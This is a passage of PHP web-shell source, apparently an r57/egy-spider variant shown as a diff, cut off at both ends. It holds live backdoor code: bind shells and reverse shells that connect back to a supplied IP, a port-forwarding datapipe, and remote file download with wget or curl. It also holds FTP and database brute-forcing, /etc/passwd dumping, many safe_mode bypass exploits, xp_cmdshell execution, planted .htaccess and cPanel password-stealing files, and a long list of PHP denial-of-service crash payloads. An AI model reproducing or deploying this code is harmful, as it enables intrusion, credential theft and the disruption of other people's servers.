$_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + morewrite($_POST['e_name'],$_POST['e_text']); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + @touch($_POST['e_name'],$mtime,$mtime); + } + + + +if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'prxpl',$prx_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &'); + @unlink($tempdir.'prxpl'); + $_POST['cmd']="ps -aux | grep prxpl"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf($tempdir.'bd.c',$port_bind_bd_c); + $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c'); + @unlink($tempdir.'bd.c'); + $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); + @unlink($tempdir.'bd'); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'bdpl',$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &'); + @unlink($tempdir.'bdpl'); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'back',$back_connect); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'back.c',$back_connect_c); + $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c'); + @unlink($tempdir.'back.c'); + $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'dp',$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); + @unlink($tempdir.'dp'); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'dpc.c',$datapipe_c); + $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c'); + @unlink($tempdir.'dpc.c'); + $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); + @unlink($tempdir.'dpc'); + $_POST['cmd']="ps -aux | grep dpc"; +} + + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + + +for($upl=0;$upl<=16;$upl++) +{ + if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ + if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; } + else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; } + @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>"); + } +} +if (!empty($_POST['port1'])) +{ + cf("bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + $blah = ex("./bds ".$_POST['port1']." &"); + $_POST['cmd']="echo \"Now script install backdoor connect to port "; + }else{ +cf("/tmp/bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + } +if (!empty($_POST['php_ini1'])) +{ + cf("php.ini",$egy_ini); + $_POST['cmd']=" now make incloude for file ini.php and add ss and your shell"; + } + + + if (!empty($_POST['htacces'])) +{ + cf(".htaccess",$htacces); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_res'])) +{ + cf(".ini.php",$egy_res); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_ini'])) +{ + cf("ini.php",$egy_ini); + + + + $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now make incloude for file ini.php and add egy and your shell"; + } + + + if (!empty($_POST['egy_cp'])) +{ + cf("pass_cpanel.php",$egy_cp); + $_POST['cmd']="cpanel add"; + } + + + if (!empty($_POST['egy_vb'])) +{ + cf("vb_hacker.php",$egy_vb); + $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php "; + } + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + + +for($upl=0;$upl<=16;$upl++) +{ + + +} + + +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case 'fopen': + $datafile = @implode("", @file($_POST['rem_file'])); + if($datafile) + { + if(!morewrite($_POST['loc_file'],$datafile)){ err(0);}; + } + + + $_POST['cmd'] = ''; + break; + case 'wget': + $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\""; + break; + case 'fetch': + $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + case 'lynx': + $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'links': + $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'GET': + $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'curl': + $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + } +} +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down"))) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } + + +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute"))) + { + if($_POST['cmd']=="ftp_brute"){ + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + }else if($_POST['cmd']=="db_brute"){ + $connection = 1; + } + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);} + } + + +echo $table_up3; +if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +{ + switch($_POST['cmd']) + { + case 'safe_dir': + + if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + foreach ($d as $file) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + } + + + elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + + elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=@readdir($d))) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + @closedir($d); + } + + + elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath']))) + { + echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n"; + function eh($errno, $errstr, $errfile, $errline) + { + global $D, $c, $i; + preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); + if($o){ $D[$c] = $o[2]; $c++;} + } + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_WARNING); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $root = "/"; + if($dir) $root = $dir; + $c = 0; $D = array(); + @set_error_handler("eh"); + $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + for($i=0; $i < strlen($chars); $i++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; + $prevD = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD) + { + for($j=0; $j < strlen($chars); $j++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; + $prevD2 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD2) + { + for($p=0; $p < strlen($chars); $p++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; + $prevD3 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD3) + { + for($r=0; $r < strlen($chars); $r++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; + @glob($path."*"); + } + } + } + } + } + } + } + $D = array_unique($D); + foreach($D as $item) echo "{$item}\r\n"; + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n"; + error_reporting($error_reporting); + } + elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath']))) + { + echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n"; + if(!$dir){$dir='/etc/';}; + if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';} + if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';} + + + if($realpath=realpath($dir.'/')){echo $realpath."\r\n";} + if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";} + foreach($presets_rlph as $preset_rlph){ + if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";} + } + for($i=0; $i < strlen($chars_rlph); $i++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=1){continue;}; + for($j=0; $j < strlen($chars_rlph); $j++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=2){continue;}; + for($x=0; $x < strlen($chars_rlph); $x++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=3){continue;}; + for($y=0; $y < strlen($chars_rlph); $y++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=4){continue;}; + for($z=0; $z < strlen($chars_rlph); $z++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=5){continue;}; + for($w=0; $w < strlen($chars_rlph); $w++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";} + } + } + } + } + } + } + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n"; + } + else echo $lang[$language.'_text29']; + break; + + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file']); + $cf = @curl_exec($ci); + echo htmlspecialchars($cf); + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); +/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/ + @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo htmlspecialchars($row[0])."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + $temp=tempnam($dir, "fname"); + if (@file_exists($temp)) @unlink($temp); + $extra = "-C ".$_POST['test5_file']." -X $temp"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $str = moreread($temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo htmlspecialchars($str); + @imap_close($stream); + break; + case 'test8': + $temp=@tempnam($_POST['test8_file2'], "copytemp"); + $str = readzlib($_POST['test8_file1'],$temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + + case 'test9': + @ini_restore("safe_mode"); + @ini_restore("open_basedir"); + $str = moreread($_POST['test9_file']); + echo htmlspecialchars($str); + break; + case 'test10': + @ob_clean(); + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_ALL ^ E_NOTICE); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $str=@fopen($_POST['test10_file'],"r"); + while(!feof($str)){print htmlspecialchars(fgets($str));} + fclose($str); + error_reporting($error_reporting); + break; + case 'test11': + @ob_clean(); + $temp = 'zip://'.$_POST['test11_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test12': + @ob_clean(); + $temp = 'compress.bzip2://'.$_POST['test12_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test13': + @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']); + echo $lang[$language.'_text61']; + break; + case 'test14': + @session_save_path($_POST['test14_file2']."\0;$tempdir"); + @session_start(); + @$_SESSION[php]=$_POST['test14_file1']; + echo $lang[$language.'_text61']; + break; + case 'test15': + @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']); + echo $lang[$language.'_text61']; + + break; + case 'test_5_2_6': +echo getcwd()."\n"; +chdir($_POST['test_5_2_6']); +echo getcwd()."\n"; + break; + + + case 'test2_5_2_6': +var_dump(posix_access($_POST['test15_file1'])); + + + break; + + case 'test_5_2_4': +//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass + + +//author: shinnai +//mail: shinnai[at]autistici[dot]org +//site: http://shinnai.altervista.org + + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + + +//Technical details: +//ionCube version: 6.5 +//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) +//url: www.egyspider.eu + + +//php.ini settings: +//safe_mode = On +//disable_functions = ioncube_read_file, readfile + + +//Description: +//This is useful to obtain juicy informations but also to retrieve source +//code of php pages, password files, etc... you just need to change file path. +//Anyway, don't worry, nobody will read your obfuscated code :) + + +//greetz to: BlackLight for help me to understand better PHP + + +//P.S. +//This extension contains even an interesting ioncube_write_file function... + + +if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required! You are now can establish any order"); + + +$path = str_repeat("..\\", 20); + + +$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :) + + +$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); + + +echo $MyBoot_readfile; + + +echo "<br><br>ionCube output:<br><br>"; + + +echo $MyBoot_ioncube; + break; + + + + case 'egy_perl': +if(!extension_loaded('perl'))die('perl extension is not loaded'); +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'; +$perl=new perl(); +echo "<textarea rows='25' cols='75'>"; +$perl->eval("system('".$_GET['cmd']."')"); +echo "</textarea>"; +$_GET['cmd']=htmlspecialchars($_GET['cmd']); + break; + + break; + case 'egy_4_2_0': + for ($i = 0; $i < 60000; $i++) + { + if (($tab = @posix_getpwuid($i)) != NULL) + { + echo $tab['name'].":"; + echo $tab['passwd'].":"; + echo $tab['uid'].":"; + echo $tab['gid'].":"; + echo $tab['gecos'].":"; + echo $tab['dir'].":"; + echo $tab['shell']."<br>"; + } + } + break; + + + + + case 'egy_5_2_3': +//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass + + +//author: egy spider +//mail: egy_spider@hotmail.com +//site: http://egyspider.eu + + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + + +//Thanks to rgod for all his precious advises :) + + +//I set php.ini in this way: +//safe_mode = On +//disable_functions = system +//if you launch the exploit from the cli, cmd.exe will be wxecuted +//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager + + +if (!extension_loaded("win32std")) die("win32std extension required!"); +system("cmd.exe"); //just to be sure that protections work well +win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); + break; + + + break; + + + case 'test16': + if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61']; + break; + case 'test17_1': + @unlink('symlinkread'); + @symlink('a/a/a/a/a/a/', 'dummy'); + @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread'); + @unlink('dummy'); + while (1) + { + @symlink('.', 'dummy'); + @unlink('dummy'); + } + break; + case 'test17_2': + $str=''; + while (strlen($str) < 3) { +/* $str = moreread('symlinkread');*/ + $str = @file_get_contents('symlinkread'); + if($str){ @ob_clean(); echo htmlspecialchars($str);} + } + break; + case 'test17_3': + $dir = $files = array(); + if(@version_compare(@phpversion(),"5.0.0")>=0){ + while (@count($dir) < 3) { + $dir=@scandir('symlinkread'); + if (@count($dir) > 2) {@ob_clean(); @print_r($dir); } + } + } + else { + while (@count($files) < 3) { + $dh = @opendir('symlinkread'); + while (false !== ($filename = @readdir($dh))) { + $files[] = $filename; + } + if(@count($files) > 2){@ob_clean(); @print_r($files); } + } + } + break; + case 'test18': + @putenv("TMPDIR=".$_POST['test18_file2']); + @ini_set("session.save_path", ""); + @ini_alter("session.save_path", ""); + @session_start(); + @$_SESSION[php]=$_POST['test18_file1']; + echo $lang[$language.'_text61']; + break; + case 'test19': + if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; } + $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']); + if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;}; + $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); + $m->set_local_infile_handler("r"); + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )"); + $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table"); + $r = $m->query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->close(); + break; + } +} + + +if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +}/*elseif($safe_mode){ + $cmd_rep = safe_ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +} +*/ + + +switch($_POST['cmd']) +{ + case 'dos1': + function a() { a(); } a(); + break; + case 'dos2': + @pack("d4294967297", 2); + break; + case 'dos3': + $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a))); + break; + case 'dos4': + $t = array(1);while (1) {$a[] = &$t;}; + break; + case 'dos5': + @dl("sqlite.so");$db = new SqliteDatabase("foo"); + break; + case 'dos6': + preg_match('/(.(?!b))*/', @str_repeat("a", 10000)); + break; + case 'dos7': + @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); + break; + case 'dos8': + @shell_exec("killall -11 httpd"); + break; + case 'dos9': + function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx(); + break; + case 'dos10': + $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0); + break; + case 'dos11': + @array_fill(1,123456789,"Infigo-IS"); + break; + case 'dos12': + @substr_compare("A","A",12345678); + break; + case 'dos13': + @unserialize("a:2147483649:{"); + break; + case 'dos14': + $Data = @str_ireplace("\n", "<br>", $Data); + break; + case 'dos15': + function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);} + $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);} + @htmlentities($str1, ENT_NOQUOTES, "UTF-8"); + break; + case 'dos16': + $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e); + for ($i=0; $i<1000; $i++) $arr[$i]=array(array("")); + unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]); + break; + case 'dos17': + $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; + $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; + $x = "AQ "; + unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x); + break; + case 'dos18': + $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); + if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) + echo "Msg not sent because $msg_err\n"; + if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { + echo "$msg\n"; + } else { echo "Received $msg_error fetching message\n"; break; } + @msg_remove_queue ($msg_id); + break; + case 'dos19': + $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r"); + break; + case 'dos20': + $hashtable = str_repeat("A", 39); + $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08); + $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99); + $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}'; + for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; } + $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;'; + @unserialize($str); + break; + case 'dos21': + imagecreatetruecolor(1234,1073741824); + break; + case 'dos22': + imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120); + break; + case 'dos23': + $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b); + break; + case 'dos24': + setlocale(LC_COLLATE, str_repeat("A", 34438013)); + break; + case 'dos25': + glob(str_repeat("A", 9638013)); + break; + case 'dos26': + glob("a",-1); + break; + case 'dos27': + fnmatch("*[1]e", str_repeat("A", 9638013)); + break; + case 'dos28': + if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";} + break; + case 'dos29': + if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');} + break; + case 'dos30': + $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); 